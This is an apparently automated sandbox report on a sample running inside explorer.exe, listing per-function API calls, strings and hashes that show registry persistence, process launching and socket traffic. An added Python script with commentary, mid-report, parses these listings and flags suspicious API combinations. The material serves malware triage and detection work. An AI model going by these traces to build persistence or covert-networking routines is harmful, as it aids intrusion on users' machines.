                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$AllocTask$FolderKnownPath_errno_invalid_parameter_noinfolstrlen
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 2950865958-2868705786
                          • Opcode ID: e87af4adcf4b971b7a9ea5863792aeab0100afc9c8f44779608da6c5abcd29c6
                          • Instruction ID: 782d7f92d192667c0bff4b9f7b263fccac920eef538cc1d8da70b46b4f71f3e2
                          • Opcode Fuzzy Hash: e87af4adcf4b971b7a9ea5863792aeab0100afc9c8f44779608da6c5abcd29c6
                          • Instruction Fuzzy Hash: 5821DB72124A8582E7289F15E8947EA7761F7C8B5CF54012AFB8E47B68DF3CC545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _fileno$_errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 482796045-0
                          • Opcode ID: b4b3d6fc9dc7e4860d266c267018562cdbfaf00e8137f1052f831943caba0ce4
                          • Instruction ID: 6f15b0419c31f528d0da3ead016592757c28bbf1808ba697c526ee964b71db9e
                          • Opcode Fuzzy Hash: b4b3d6fc9dc7e4860d266c267018562cdbfaf00e8137f1052f831943caba0ce4
                          • Instruction Fuzzy Hash: 1F51062A214A91C5DB2C9F3999902BD6720FBB9FA8F144319FB7A4B7D0DF28C4528301
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
                          • String ID:
                          • API String ID: 4082634633-0
                          • Opcode ID: b44917637bbf1f89a7f45a35ef9faf2f22883a734568f6132f706dea1eeab0f1
                          • Instruction ID: 4c097eab109bc50fe30132c052377d90b74748e1b7a1e326f72455aecd102466
                          • Opcode Fuzzy Hash: b44917637bbf1f89a7f45a35ef9faf2f22883a734568f6132f706dea1eeab0f1
                          • Instruction Fuzzy Hash: E031AF7060174786EBAD77B5A8D03F922A5AF9134CF044039DB5683292FF7CC446C752
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventExitThreadUser$AsyncCloseHandleObjectOpenSingleSleepStateWaitlstrlen
                          • String ID: 2${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 4137407306-994883157
                          • Opcode ID: 994a8e8ff916f57d867b8865c044ee6ee85714d811b882fb27882ff3b1c0216c
                          • Instruction ID: 3a87a6edddbcbea6d76d134fd338ae0d74a888d1ce2028879ae8fa10459f03b9
                          • Opcode Fuzzy Hash: 994a8e8ff916f57d867b8865c044ee6ee85714d811b882fb27882ff3b1c0216c
                          • Instruction Fuzzy Hash: 17819376209BC485D779DB10F4943DAB7A8F788354F90422ACB8D42B68EF3CC199CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CreateFrameInfo_amsg_exit
                          • String ID: csm
                          • API String ID: 2825728721-1018135373
                          • Opcode ID: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                          • Instruction ID: 1ae8f5c6b31d13ba5c8ba4ec2abf09cecb116e6338b3ef2795fa07ae30752f85
                          • Opcode Fuzzy Hash: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                          • Instruction Fuzzy Hash: BD417E36204B82D2CA39AF16F4803AE77A5FB89BA9F444225DF9D07B54DF38C0A5C701
                          APIs
                          • SHGetKnownFolderPath.SHELL32 ref: 011A01F8
                          • LocalAlloc.KERNEL32 ref: 011A0210
                          • LocalFree.KERNEL32 ref: 011A030B
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • lstrlenW.KERNEL32 ref: 011A0262
                          • GetFileAttributesW.KERNEL32 ref: 011A02CA
                          • SHFileOperationW.SHELL32 ref: 011A02E3
                          • CoTaskMemFree.COMBASE ref: 011A0316
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask_errno_invalid_parameter_noinfolstrlen
                          • String ID: %s\%s${1696C082-D722-4591-A9C7-217696659A97}
                          • API String ID: 2444233868-2324704760
                          • Opcode ID: 114d894e8b8712ade2050ea490133d1fbe5f606a5f121444ac17ba17da42a113
                          • Instruction ID: 58781f1bdee60c4d28a038988eb67b3567e01d9149b80216e0d5e198837e0714
                          • Opcode Fuzzy Hash: 114d894e8b8712ade2050ea490133d1fbe5f606a5f121444ac17ba17da42a113
                          • Instruction Fuzzy Hash: 4E312075218A4486E758DF19E8843AA7BB1FBC9794F501026F78F83A68DF3DC486CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                          • String ID: {2C62FD04-7315-45E1-81CC-8E836772E64E}
                          • API String ID: 1237952354-2543154685
                          • Opcode ID: 1d5d3e7f1e2eac2bd7ea67f9950bb0886d2ddd34607480052f5632d741a32fd0
                          • Instruction ID: b2fe93ae5cbcc52a02038c56ca66c6dff6bfca823f80c473319234cadc5e1402
                          • Opcode Fuzzy Hash: 1d5d3e7f1e2eac2bd7ea67f9950bb0886d2ddd34607480052f5632d741a32fd0
                          • Instruction Fuzzy Hash: 99312775248B81C2F7289B24F8947DA77A1FB94744F90502AD78E43A78DF3CC14ACB80
                          APIs
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B34E0: send.WS2_32 ref: 011B350C
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuesend
                          • String ID:
                          • API String ID: 1596855159-0
                          • Opcode ID: 36c340b5594caf7fedd5d2e1c5654e297a7404e4b9dd5892987c8b85f93f5022
                          • Instruction ID: 338b6e2b0141d8c1dc6deceaa5041cbc11f493e3f67450da4a53349389812f94
                          • Opcode Fuzzy Hash: 36c340b5594caf7fedd5d2e1c5654e297a7404e4b9dd5892987c8b85f93f5022
                          • Instruction Fuzzy Hash: 71C1D6366097C0CAD7B9CB19E4847EAB7A1F788744F01811AE78A83B59DB79C485CF02
                          APIs
                          • setsockopt.WS2_32 ref: 011A42CE
                          • SetEvent.KERNEL32 ref: 011A4479
                          • WaitForSingleObject.KERNEL32 ref: 011A44E1
                          • CloseHandle.KERNEL32 ref: 011A4544
                          • CloseHandle.KERNEL32 ref: 011A45D8
                          • VirtualFree.KERNEL32 ref: 011A4683
                          • shutdown.WS2_32 ref: 011A475D
                          • closesocket.WS2_32 ref: 011A4768
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeCloseConcurrency::details::platform::__HandleQueue$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                          • String ID: d
                          • API String ID: 1089388041-2564639436
                          • Opcode ID: eb3c52e496b65605d03f19e217382a664853bb10ffbae4b472a6557e73bb4790
                          • Instruction ID: ae96faa096626700d30aa9f0d1ccf63600bc08223041c76c8f40bdec90264e1d
                          • Opcode Fuzzy Hash: eb3c52e496b65605d03f19e217382a664853bb10ffbae4b472a6557e73bb4790
                          • Instruction Fuzzy Hash: 6CC13D36208F8085EB78DB04F4943EAA7A0F7D5754F914626D68E87BA8EF7CC195CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 144976343-2564639436
                          • Opcode ID: f5f5c75b8162aad1a5c465ca517c8a5032cabfa6638f8675b1b353c44dc430bd
                          • Instruction ID: 3d52f4005f01c57a8028791696e28bdd27051d3e061b9669a308ed9e45073c59
                          • Opcode Fuzzy Hash: f5f5c75b8162aad1a5c465ca517c8a5032cabfa6638f8675b1b353c44dc430bd
                          • Instruction Fuzzy Hash: 86419536218B8482DB18DB19F49439AB7B0F3C5B94F11512AEB9E47B68CF7DC495CB40
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011A38F6
                          • GetSystemDirectoryW.KERNEL32 ref: 011A3917
                          • LocalAlloc.KERNEL32 ref: 011A392F
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • CreateProcessW.KERNEL32 ref: 011A3A0E
                          • LocalFree.KERNEL32 ref: 011A3A1E
                          • LocalFree.KERNEL32 ref: 011A3A29
                          • LocalFree.KERNEL32 ref: 011A3A3B
                          • LocalFree.KERNEL32 ref: 011A3A46
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem_errno_invalid_parameter_noinfolstrlen
                          • String ID: h
                          • API String ID: 1407737935-2439710439
                          • Opcode ID: 5cfd65f1d10050b0c964e5d9f941a3bb9fc1a00c6d635ad714ec9a61c2ba5579
                          • Instruction ID: 0ab5a07ba9b99b94d33dd68bf6d57f731a4d7b46acc588e1ca83983ab3792f9b
                          • Opcode Fuzzy Hash: 5cfd65f1d10050b0c964e5d9f941a3bb9fc1a00c6d635ad714ec9a61c2ba5579
                          • Instruction Fuzzy Hash: 27311876218B8582E7289F50F49439ABBA1F7C4798F504129EB8987B68DFBCC449CF00
                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 0119786E
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegOpenKeyW.ADVAPI32 ref: 011978B3
                          • lstrlenW.KERNEL32 ref: 011978C2
                          • RegSetValueExW.ADVAPI32 ref: 011978F5
                          • RegCloseKey.ADVAPI32 ref: 01197907
                          • RegCloseKey.ADVAPI32 ref: 0119791C
                          Strings
                          • {F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}, xrefs: 0119787C
                          • {B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}, xrefs: 011978E6
                          • SOFTWARE\%s, xrefs: 01197883
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
                          • String ID: SOFTWARE\%s${B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 3731830441-3335224962
                          • Opcode ID: e4ce0b43109d6df259eb14dcb2e7d2f80396993e1aa89159513a0b9c8b62aa1e
                          • Instruction ID: e2dbee1c463089ec4859f0cf4f797bfa43509d49e2466e1b0f574d2f0fdb768e
                          • Opcode Fuzzy Hash: e4ce0b43109d6df259eb14dcb2e7d2f80396993e1aa89159513a0b9c8b62aa1e
                          • Instruction Fuzzy Hash: 61112431324A8491DB68DF25F8947DA73A1FB84B95F80112ADB5E836A8EF7CC145CB44
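The per-function API listings in this report carry the triage signal on their own: the function above writes the module's own path (GetModuleFileNameW) under a "SOFTWARE\%s" key via RegOpenKeyW/RegSetValueExW, another launches a binary resolved from GetSystemDirectoryW with CreateProcessW, and a third moves a file into a known folder with SHGetKnownFolderPath/SHFileOperationW. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: a Python parser for this "APIs / Strings / Similarity" record layout plus a small rule matcher that flags such API combinations. The embedded SAMPLE text is constructed to mirror records from this report, and the rule names and API groupings are the example's own assumptions.

```python
"""Parse Joe Sandbox per-function API listings and flag API combinations
worth a closer look.  Added example, not part of the report; the SAMPLE
input below is constructed to mirror the report's record layout."""
import re
from dataclasses import dataclass, field

# One "• Name.MODULE(args), ref: ADDR" line; subcall lines carry a prefix.
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# One "• value, xrefs: ADDR" line from a Strings section.
STRING_RE = re.compile(r"^•\s*(?P<value>.*?),\s*xrefs:\s*[0-9A-Fa-f]+\s*$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}

# Hypothetical rule set (the example's own): a rule fires when every group
# contributes at least one API name seen in the record.
RULES = {
    "registry-write-of-own-path": [
        {"GetModuleFileNameW", "GetModuleFileNameA"},
        {"RegOpenKeyW", "RegOpenKeyExW", "RegCreateKeyW", "RegCreateKeyExW"},
        {"RegSetValueExW", "RegSetValueExA", "RegSetValueW"}],
    "spawn-from-system-directory": [
        {"GetSystemDirectoryW", "GetSystemDirectoryA"},
        {"CreateProcessW", "CreateProcessA"}],
    "shell-file-op-into-known-folder": [
        {"SHGetKnownFolderPath"},
        {"SHFileOperationW", "SHFileOperationA"}],
}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    subcall: bool


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: str = ""

    @property
    def ref(self) -> str:
        """Address of the first direct call, used as the record's handle."""
        return next((c.ref for c in self.apis if not c.subcall), "")


def parse_report(text: str) -> list:
    """Split the listing into records; each one opens with an 'APIs' heading."""
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            section = "APIs"
        elif line in SECTIONS:
            section = line
        elif cur is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"],
                                    m["ref"].upper(), m["sub"] is not None))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append(m["value"])
        elif section == "Similarity" and line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
    return records


def match_rules(records, include_subcalls: bool = False) -> list:
    """Return (rule, first-call address, strings) for every record that hits."""
    hits = []
    for rec in records:
        names = {c.name for c in rec.apis if include_subcalls or not c.subcall}
        for rule, groups in RULES.items():
            if all(names & group for group in groups):
                hits.append((rule, rec.ref, tuple(rec.strings)))
    return hits


# Constructed sample mirroring four records of this report (not report output).
SAMPLE = r"""
APIs
• GetModuleFileNameW.KERNEL32 ref: 0119786E
  • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
• RegOpenKeyW.ADVAPI32 ref: 011978B3
• RegSetValueExW.ADVAPI32 ref: 011978F5
• RegCloseKey.ADVAPI32 ref: 01197907
Strings
• {F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}, xrefs: 0119787C
• SOFTWARE\%s, xrefs: 01197883
Similarity
• Opcode ID: e4ce0b43109d6df259eb14dcb2e7d2f80396993e1aa89159513a0b9c8b62aa1e
APIs
• LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011A38F6
• GetSystemDirectoryW.KERNEL32 ref: 011A3917
• CreateProcessW.KERNEL32 ref: 011A3A0E
Strings
Memory Dump Source
APIs
• SHGetKnownFolderPath.SHELL32 ref: 011A01F8
• SHFileOperationW.SHELL32 ref: 011A02E3
APIs
• LCMapStringW.KERNEL32 ref: 011C1592
• free.LIBCMT ref: 011C16C0
"""

if __name__ == "__main__":
    for rule, addr, strs in match_rules(parse_report(SAMPLE)):
        print(f"{addr}: {rule} strings={strs}")
```

Run it against the full "Executed Functions" listing of a report to get one line per flagged function, with the address that the report's own "ref:" entries use, so the hit can be found again in the memory dump. Subcall entries are excluded by default because they describe the callee, not the function under review; pass include_subcalls=True to widen the net.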
                          APIs
                          • MultiByteToWideChar.KERNEL32 ref: 011C14CE
                          • malloc.LIBCMT ref: 011C1537
                          • MultiByteToWideChar.KERNEL32 ref: 011C156B
                          • LCMapStringW.KERNEL32 ref: 011C1592
                          • LCMapStringW.KERNEL32 ref: 011C15DA
                          • malloc.LIBCMT ref: 011C1637
                            • Part of subcall function 011BC7A8: _FF_MSGBANNER.LIBCMT ref: 011BC7D8
                            • Part of subcall function 011BC7A8: HeapAlloc.KERNEL32(?,?,?,011C06FC,?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5), ref: 011BC7FD
                            • Part of subcall function 011BC7A8: _callnewh.LIBCMT ref: 011BC816
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC821
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC82C
                          • LCMapStringW.KERNEL32 ref: 011C166C
                          • WideCharToMultiByte.KERNEL32 ref: 011C16AC
                          • free.LIBCMT ref: 011C16C0
                          • free.LIBCMT ref: 011C16D1
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                          • String ID:
                          • API String ID: 1080698880-0
                          • Opcode ID: 775727bf0992f1fd30e19aae136c0ffe87d5617b5013afb31929f2c8c6fdd627
